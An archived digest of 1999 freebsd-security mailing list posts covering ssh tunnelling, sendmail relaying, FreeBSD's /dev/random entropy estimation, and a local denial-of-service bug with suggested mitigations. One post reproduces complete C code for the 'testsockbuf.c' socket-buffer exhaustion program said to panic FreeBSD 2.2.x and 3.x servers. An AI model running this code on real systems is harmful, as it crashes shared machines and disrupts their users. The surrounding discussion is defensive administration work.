From owner-freebsd-security Sun Aug 15 19:59:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from sludge.pgh.pa.us (sludge.pgh.pa.us [206.210.78.220]) by hub.freebsd.org (Postfix) with ESMTP id 1C0D3153CE for ; Sun, 15 Aug 1999 19:59:14 -0700 (PDT) (envelope-from durham@sludge.pgh.pa.us) Received: (from durham@localhost) by sludge.pgh.pa.us (8.8.8/8.8.8) id WAA21810; Sun, 15 Aug 1999 22:58:21 -0400 (EDT) (envelope-from durham) Date: Sun, 15 Aug 1999 22:58:21 -0400 (EDT) From: "James C. Durham" Message-Id: <199908160258.WAA21810@sludge.pgh.pa.us> To: barrett@pheonix.aye.net, freebsd-security@freebsd.org, nick@rapidnet.com Subject: Re: ssh dropping connections/sendmail IP Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Barrett Richardson wrote: > > On Wed, 11 Aug 1999, James C. Durham wrote: > > > I am using ssh to tunnel from my "remote server" located > > at a remote location with a public IP number to my "local > > server" behind an ISP's firewall using a DSL connection. > > > > The ssh connection keeps dropping out. I have KeepAlive "YES" and > > IdleTime set to 104w (2 years). I have just started having a little > > script on the remote machine send me the date/time every 30 seconds > > and that seems to keep it up. Is this behavior normal? > > > > The frequency of the keepalives isn't sufficient traffic to keep > the firewall from snipping the connection. It doesn't consider > the connection active if traffic drops below a threshold. > > > Also, I'm having problems sending mail from sendmail on my local > > machine because the IP gets translated to something that doesn't > > resolve at the ISP's firewall. This means I can't send to > > some sites (freebsd-security being one of them!). I've been trying > > to see a way that I can relay the sendmail feed through my remote server > > using port redirection. I can't run the sendmail daemon on the remote > > server because port 25 is already bound to ssh. > > The remote server is the one outside the firewall, right? Any > reason you can't run sshd on the de facto port 22? > I'm sorry for the late reply..bad weekend! However, sshd is running on 22, but 25 and 80 are being relayed by sshd2 and are already bound. Nick Rogness wrote: > > On Wed, 11 Aug 1999, James C. Durham wrote: > > > Also, I'm having problems sending mail from sendmail on my local > > machine because the IP gets translated to something that doesn't > > resolve at the ISP's firewall. This means I can't send to > > I'm assuming that sendmail responds with a 451 error: > ...sender domain must resolve... > > Sendmail has the capability to do this. You just have to build a > sendmail cf file to relay/masquerade your mail off of another > server that has an actual reverse lookup. > > ******************************************************************* > Nick Rogness Shaw's Principle: > System Administrator Build a system that even a fool > RapidNet, INC can use, and only a fool will > nick@rapidnet.com want to use it. > ******************************************************************* Yes, what I'd like to do is relay through my remote server, but I can't run sendmail there on port 25 beczuse it's already bound by ssh. Moving one of the sendmails to another port looks like it means some source modifications, as it appears to pick up both the listen and send port numbers from /etc/services. Anyway, thaanks for the replies -Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 1:24:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from ida.interface-business.de (ida.interface-business.de [193.101.57.203]) by hub.freebsd.org (Postfix) with ESMTP id DB3A914F54; Mon, 16 Aug 1999 01:24:03 -0700 (PDT) (envelope-from j@ida.interface-business.de) Received: (from j@localhost) by ida.interface-business.de id KAA21234; Mon, 16 Aug 1999 10:23:46 +0200 (MET DST) Date: Mon, 16 Aug 1999 10:23:46 +0200 From: J Wunsch To: core@freebsd.org, security@freebsd.org Subject: [roessler@guug.de: /dev/random unter FreeBSD] Message-ID: <19990816102346.F21120@ida.interface-business.de> Reply-To: Joerg Wunsch Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i X-Phone: +49-351-31809-14 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E Organization: interface business GmbH, Dresden Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thomas Roessler forwarded me the following. Since enthropy theories and the implementation details of our /dev/random are beyond my field of knowledge and interest, i'm forwarding this to whomever it may concern. ----- Forwarded message from "Theodore Y. Ts'o" ----- Date: Sat, 14 Aug 1999 23:41:03 -0400 From: "Theodore Y. Ts'o" To: David Honig Cc: "Arnold G. Reinhold" , "Theodore Y. Ts'o" , cryptography@c2.net, linux-ipsec@clinet.fi, Bill Stewart Subject: Re: Summary re: /dev/random Address: 1 Amherst St., Cambridge, MA 02139 Phone: (617) 253-8091 Date: Fri, 13 Aug 1999 13:55:29 -0700 From: David Honig I have posted about using Maurer's Universal Statistical Test to measure entropy. With this tool you can see the effect of various conditioning [see RFC 1750] algorithms. (Of course, if your conditioning is a secure hash, the entropy measure is pinned at maximum). This would provide a better estimation function IMO than the current estimation function, which I consider too generous. With all due respect, Theo. I should point out that the FreeBSD /dev/random driver is an extremely hacked-up, ancient version of my driver. The FreeBSD folks have made all sorts of changes to it, and while I recognize some of the code as being mine, they have made enough changes to it that it really isn't fair to judge it as being my driver. If you examine the latest /dev/random sources in Linux, you will find that it is much, much more conservative about the entropy estimation than the hacked-up 0.95 /dev/random driver found in FreeBSD (the last modified by me in October, 1995 should be a hint that it's not recent). I'm willing to believe that there are still things which can be critized in the current entropy estimation algorithm, but please use something more recent than FreeBSD's /dev/random driver as the basis for your criticism! I looked at your paper, but it is far too technical for me to evaluate without a large amount of meditation, and probably not without tracking down all of the relevant references. (With all due respect, it's written in the standard Mathematician's style --- encrypted by formulae guaranteed to make it opaque to all but those who are trained in the peculiar style of Mathematics' papers. I'm not a mathematician, so it would take far more time that I have right now to decrypt it. I have printed it out and will try to puzzle it out later when I have time.) If I remember correctly, last time someone tried to pursuade me to use Maurer's test (when it was explained to me in Layman's English --- hi Colin!), my problem with it was that it was too memory intensive and too CPU intensive to use in the kernel. I'm quite willing to be proven wrong, if someone wants to try to explain to me Maurer's test and how to do it in English, and then try to pursuade me that it's actually feasible to do it in the kernel. Better yet, send me C source code.... I'll be happy to consider it. - Ted ----- End forwarded message ----- ----- End forwarded message ----- -- J"org Wunsch Unix support engineer joerg_wunsch@interface-business.de http://www.interface-business.de/~j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 15:55:24 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 4D08C15577; Mon, 16 Aug 1999 15:55:23 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 3FE121CD898; Mon, 16 Aug 1999 15:55:23 -0700 (PDT) (envelope-from kris@hub.freebsd.org) Date: Mon, 16 Aug 1999 15:55:23 -0700 (PDT) From: Kris Kennaway To: Joerg Wunsch Cc: security@freebsd.org Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD] In-Reply-To: <19990816102346.F21120@ida.interface-business.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 16 Aug 1999, J Wunsch wrote: > Thomas Roessler forwarded me the following. Since > enthropy theories and the implementation details of our /dev/random > are beyond my field of knowledge and interest, i'm forwarding this to > whomever it may concern. Syncing our /dev/random code with the more recent version in Linux is something I'd like to see happen as well. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 16:37:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id E57AD155AF; Mon, 16 Aug 1999 16:37:20 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id QAA72742; Mon, 16 Aug 1999 16:36:47 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Kris Kennaway Cc: Joerg Wunsch , security@FreeBSD.ORG Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD] In-reply-to: Your message of "Mon, 16 Aug 1999 15:55:23 PDT." Date: Mon, 16 Aug 1999 16:36:47 -0700 Message-ID: <72739.934846607@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's great, but who's going to do the work? :) > On Mon, 16 Aug 1999, J Wunsch wrote: > > > Thomas Roessler forwarded me the following. Since > > enthropy theories and the implementation details of our /dev/random > > are beyond my field of knowledge and interest, i'm forwarding this to > > whomever it may concern. > > Syncing our /dev/random code with the more recent version in Linux is > something I'd like to see happen as well. > > Kris > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 17:27:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id C4E2A14BF8 for ; Mon, 16 Aug 1999 17:27:17 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA13737 for ; Mon, 16 Aug 1999 20:27:29 -0400 (EDT) Message-Id: <4.1.19990816203409.05989960@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 16 Aug 1999 20:40:29 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: Any work around for this FreeBSD bug/DoS ? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there any work around or coming fix for the 'testsockbuf.c' originally reported by Marc Olzheim on Aug 9th ? Its only a matter of time until some wannabe script kiddie uploads it to one of my servers for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I sent a message to the security officer last week but havent heard anything since then. ---Mike #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } return(0); } ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 18:21:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 2096C1546F for ; Mon, 16 Aug 1999 18:21:09 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA12524; Mon, 16 Aug 1999 18:19:46 -0700 (PDT) (envelope-from dillon) Date: Mon, 16 Aug 1999 18:19:46 -0700 (PDT) From: Matthew Dillon Message-Id: <199908170119.SAA12524@apollo.backplane.com> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? References: <4.1.19990816203409.05989960@granite.sentex.ca> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Is there any work around or coming fix for the 'testsockbuf.c' originally :reported by Marc Olzheim on Aug 9th ? Its only a matter :of time until some wannabe script kiddie uploads it to one of my servers :for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I :sent a message to the security officer last week but havent heard anything :since then. : : ---Mike Try adjusting the kern.ipc.maxsockbuf sysctl. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 18:25:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1683C1546F for ; Mon, 16 Aug 1999 18:25:07 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA25174; Mon, 16 Aug 1999 21:24:31 -0400 (EDT) Message-Id: <4.1.19990816213403.05a3b540@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 16 Aug 1999 21:37:32 -0400 To: Matthew Dillon From: Mike Tancsa Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199908170119.SAA12524@apollo.backplane.com> References: <4.1.19990816203409.05989960@granite.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Try adjusting the kern.ipc.maxsockbuf sysctl. Thanks for the quick response Matt. But to what value, and what are the implications / trade offs ? Sorry, was this discussed before somewhere ? I didnt see any followup in stable where I originally saw it posted. Doing a search in Dejanews through the mailing lists, I only see three old references to this particular param from 6 months ago. ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 18:27:53 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 9DA51157C6; Mon, 16 Aug 1999 18:27:51 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 562051CD892; Mon, 16 Aug 1999 18:27:51 -0700 (PDT) (envelope-from kris@hub.freebsd.org) Date: Mon, 16 Aug 1999 18:27:50 -0700 (PDT) From: Kris Kennaway To: "Jordan K. Hubbard" Cc: Joerg Wunsch , security@FreeBSD.ORG Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD] In-Reply-To: <72739.934846607@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 16 Aug 1999, Jordan K. Hubbard wrote: > That's great, but who's going to do the work? :) Mark Murray and I have both expressed interest in the RNG stuff. I'm not committing to the project immediately because 1) I don't have a computer (or for that matter a place to live :) right now and 2) my higher priority is the libcrypt/SRP stuff. But if no-one else takes it up, I'm planning to take a look in a month or three. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 16 22:28:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id A733214C15 for ; Mon, 16 Aug 1999 22:28:48 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id WAA13380; Mon, 16 Aug 1999 22:27:09 -0700 (PDT) (envelope-from dillon) Date: Mon, 16 Aug 1999 22:27:09 -0700 (PDT) From: Matthew Dillon Message-Id: <199908170527.WAA13380@apollo.backplane.com> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Thanks for the quick response Matt. But to what value, and what are the :implications / trade offs ? Sorry, was this discussed before somewhere ? I :didnt see any followup in stable where I originally saw it posted. Doing a :search in Dejanews through the mailing lists, I only see three old :references to this particular param from 6 months ago. : : ---Mike Well, the problem you are trying to avoid is allowing the user to over-allocate network mbufs for sockets. It will be a combination of the maximum buffer size allowed for sockets x 2 ( there are separate read and write buffers ) and the maximum number of descriptors the user can allocate. In addition to that sysctl you need to look at the 'maxproc' and 'descriptors' resource limits in /etc/login.conf, which can be set differently depending on the user id or user class (a field in the password file, see 'man 5 passwd'). So, for example, if you limit normal users to 30 processes and 40 file descriptors per process you wind up with a maximum of 1200 open descriptors. If you limit the socket buffer to 16384, that's 32K per descriptor and around 38MB of ram. The system would have to be configured with a sufficient number of network mbufs such that a single user allocating 38MB of ram does not run the system out. It is possible to adjust the number of mbuf clusters in the kernel config using the NMBCLUSTERS options (see /usr/src/sys/i386/conf/LINT). I think each cluster represents either 8K or 16K. I forget. There are many ways a user can crash the system... eating network mbufs isn't the easiest. My experience is that as long as you cover most of the bases, the few that remain will not cause enough of a problem to become endemic. Crashing a machine through a user account is not really satisfactory to most hackers since it is so easy to do -- and also relatively easy to trace. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 0:15:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from tversu.ru (mail.tversu.ru [62.76.80.2]) by hub.freebsd.org (Postfix) with ESMTP id 3ED3314DFB for ; Tue, 17 Aug 1999 00:12:48 -0700 (PDT) (envelope-from vadim@tversu.ru) Received: from gala.tversu.ru (postfix@gala.tversu.ru [62.76.80.10]) by tversu.ru (8.8.8/8.8.8) with ESMTP id LAA19960; Tue, 17 Aug 1999 11:11:39 +0400 (MSD) Received: by gala.tversu.ru (Postfix, from userid 100) id C3719701B; Tue, 17 Aug 1999 11:11:30 +0400 (MSD) Date: Tue, 17 Aug 1999 11:11:30 +0400 From: Vadim Kolontsov To: Matthew Dillon Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? Message-ID: <19990817111130.A8127@tversu.ru> References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <199908170527.WAA13380@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <199908170527.WAA13380@apollo.backplane.com>; from Matthew Dillon on Mon, Aug 16, 1999 at 10:27:09PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Aug 16, 1999 at 10:27:09PM -0700, Matthew Dillon wrote: > > So, for example, if you limit normal users to 30 processes and 40 > file descriptors per process you wind up with a maximum of 1200 open > descriptors. If you limit the socket buffer to 16384, that's 32K > per descriptor and around 38MB of ram. The system would have to be > configured with a sufficient number of network mbufs such that a single > user allocating 38MB of ram does not run the system out. I've read that "once memory is allocated for mbufs clusters, it is never freed". So after user program exits/dies, 38MB list of free mbufs remains; will it have any [network code] perfomance consequences? will those mbufs just be paged out? sorry if the question doesn't make sense :) V. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 3: 0:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.133]) by hub.freebsd.org (Postfix) with ESMTP id 391DD14F32; Tue, 17 Aug 1999 03:00:02 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id MAA39422; Tue, 17 Aug 1999 12:00:23 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199908171000.MAA39422@gratis.grondar.za> To: Kris Kennaway Cc: Joerg Wunsch , security@FreeBSD.ORG Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD] Date: Tue, 17 Aug 1999 12:00:22 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon, 16 Aug 1999, J Wunsch wrote: > > > Thomas Roessler forwarded me the following. Since > > enthropy theories and the implementation details of our /dev/random > > are beyond my field of knowledge and interest, i'm forwarding this to > > whomever it may concern. > > Syncing our /dev/random code with the more recent version in Linux is > something I'd like to see happen as well. I am (slowly) working on an implementation of Bruce Schneier's Yarrow. This is a major improvement. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 10:21:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 2C98214F32 for ; Tue, 17 Aug 1999 10:21:10 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id NAA27019; Tue, 17 Aug 1999 13:18:48 -0400 (EDT) Message-Id: <3.0.5.32.19990817131742.02a5f6c0@staff.sentex.ca> X-Sender: mdtpop@staff.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Tue, 17 Aug 1999 13:17:42 -0400 To: Matthew Dillon From: Mike Tancsa Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199908170527.WAA13380@apollo.backplane.com> References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:27 PM 8/16/99 -0700, Matthew Dillon wrote: >:Thanks for the quick response Matt. But to what value, and what are the >:implications / trade offs ? Sorry, was this discussed before somewhere ? I >:didnt see any followup in stable where I originally saw it posted. Doing a >:search in Dejanews through the mailing lists, I only see three old >:references to this particular param from 6 months ago. >: >: ---Mike > > Well, the problem you are trying to avoid is allowing the user to > over-allocate network mbufs for sockets. It will be a combination of > the maximum buffer size allowed for sockets x 2 ( there are separate > read and write buffers ) and the maximum number of descriptors the user > can allocate. In addition to that sysctl you need to look at the > 'maxproc' and 'descriptors' resource limits in /etc/login.conf, which > can be set differently depending on the user id or user class (a field > in the password file, see 'man 5 passwd'). > > So, for example, if you limit normal users to 30 processes and 40 > file descriptors per process you wind up with a maximum of 1200 open > descriptors. If you limit the socket buffer to 16384, that's 32K > per descriptor and around 38MB of ram. The system would have to be > configured with a sufficient number of network mbufs such that a single > user allocating 38MB of ram does not run the system out. It is possible > to adjust the number of mbuf clusters in the kernel config using the > NMBCLUSTERS options (see /usr/src/sys/i386/conf/LINT). I think each > cluster represents either 8K or 16K. I forget. Thanks for the extended info. What I am suprised at is that even with MAXUSERS set to 128, I have to use something as restrictive as dialu:\ :copyright=/etc/COPYRIGHT:\ :welcome=/etc/motd:\ :setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\ :path=~/bin /bin /usr/bin /usr/local/bin /usr/X11R6/bin:\ :nologin=/var/run/nologin:\ :cputime=unlimited:\ :datasize=unlimited:\ :stacksize=unlimited:\ :memorylocked-cur=10M:\ :memoryuse-max=30M:\ :maxproc-cur=9:\ :maxproc-max=15:\ :openfiles-max=16:\ :filesize=unlimited:\ :coredumpsize=unlimited:\ :priority=0:\ :ignoretime@:\ :umask=022: It seems anything above 16 files open (e.g. 32), and they are able to panic the system. > > There are many ways a user can crash the system... eating network mbufs > isn't the easiest. My experience is that as long as you cover most of > the bases, the few that remain will not cause enough of a problem to > become endemic. Crashing a machine through a user account is not > really satisfactory to most hackers since it is so easy to do -- and > also relatively easy to trace. Well, hackers are one thing, but script kiddies are another. They like to try these sorts of things :-( Sort of 'pissing in the global village well' as my friend says... No real point to it, they just like to cause damage :-( ---Mike ------------------------------------------------------------------------ Mike Tancsa, tel 01.519.651.3400 Network Administrator, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 10:35:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 10D4D14EBB for ; Tue, 17 Aug 1999 10:35:46 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id KAA18291; Tue, 17 Aug 1999 10:36:16 -0700 (PDT) (envelope-from dillon) Date: Tue, 17 Aug 1999 10:36:16 -0700 (PDT) From: Matthew Dillon Message-Id: <199908171736.KAA18291@apollo.backplane.com> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <3.0.5.32.19990817131742.02a5f6c0@staff.sentex.ca> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :Thanks for the extended info. What I am suprised at is that even with :MAXUSERS set to 128, I have to use something as restrictive as : :dialu:\ : :copyright=/etc/COPYRIGHT:\ : :welcome=/etc/motd:\ : :setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\ : :path=~/bin /bin /usr/bin /usr/local/bin /usr/X11R6/bin:\ : :nologin=/var/run/nologin:\ : :cputime=unlimited:\ : :datasize=unlimited:\ : :stacksize=unlimited:\ : :memorylocked-cur=10M:\ : :memoryuse-max=30M:\ : :maxproc-cur=9:\ : :maxproc-max=15:\ : :openfiles-max=16:\ : :filesize=unlimited:\ : :coredumpsize=unlimited:\ : :priority=0:\ : :ignoretime@:\ : :umask=022: : : :It seems anything above 16 files open (e.g. 32), and they are able to panic :the system. There have been proposals to extend the concept of per-user resources (for example, maxproc is a per-user resource). This way you would be able to set reasonable overall limits for the user that do not overly restrict the per-process limits. However, nobody has attempted to actually code the idea. It seems to me a fairly easy thing to do through the use of the credential's cache (but I'm not volunteering). -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 12: 6:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id B5EAB1576C for ; Tue, 17 Aug 1999 12:06:45 -0700 (PDT) (envelope-from barrett@phoenix.aye.net) Received: (qmail 395 invoked by uid 1000); 17 Aug 1999 18:59:55 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Aug 1999 18:59:55 -0000 Date: Tue, 17 Aug 1999 14:59:55 -0400 (EDT) From: Barrett Richardson To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Any work around for this FreeBSD bug/DoS ? In-Reply-To: <4.1.19990816203409.05989960@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 16 Aug 1999, Mike Tancsa wrote: > > Is there any work around or coming fix for the 'testsockbuf.c' originally > reported by Marc Olzheim on Aug 9th ? Its only a matter > of time until some wannabe script kiddie uploads it to one of my servers > for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I > sent a message to the security officer last week but havent heard anything > since then. > > ---Mike > I've been using a mechanism that prevents the running the arbitrary executables on my systems. I require a flag bit to be set for an executable to be run -- so if script kiddie uploads or creates a binary executable it wont run, unless I approve it by setting the flag. At the moment I let shell scripts slide which will leave you vunerable to perl -- but that could be easily changed. When I set the flag for somebody, I also set the immutable flag so a user can't overwrite it with a binary of his choosing. I've relaxed the restriction for root to avoid administrative headaches. I've been mulling over the idea of making the behavior controllable via a sysctl mib on my systems, or adding it to one of the securelevels. Would be nicer if the securelevels were more fine grained like with a mask to turn on/off various things. What would be nice would be a bit to turn it on/off for users, a bit to turn it off/on for root and a bit to turn it off/on for shell scripts. The model with using the flag bit is imperfect, but can help out when you're in a pinch. - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 16:41: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from tgn2.tgn.net (tgn2.tgn.net [205.241.85.2]) by hub.freebsd.org (Postfix) with ESMTP id BD23A14DBB; Tue, 17 Aug 1999 16:40:49 -0700 (PDT) (envelope-from butlermd@tgn.net) Received: from dial122.tgn.net (dial122.tgn.net [205.241.85.52]) by tgn2.tgn.net (8.9.3/8.8.8) with SMTP id SAA07371; Tue, 17 Aug 1999 18:44:24 -0500 (CDT) From: butlermd@tgn.net (Michael Butler) To: , list@inet-access.net, freebsd-isp@freebsd.org, freebsd-security@freebsd.org Subject: Re: tzo dynamic DNS Date: Tue, 17 Aug 1999 18:36:22 -0500 Organization: Texas GulfNet Reply-To: butlermd@tgn.net Message-ID: <37c9d331.222705972@mail.tgn.net> References: In-Reply-To: X-Mailer: Forte Agent 1.5/32.451 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hokay, boys and girls, turn 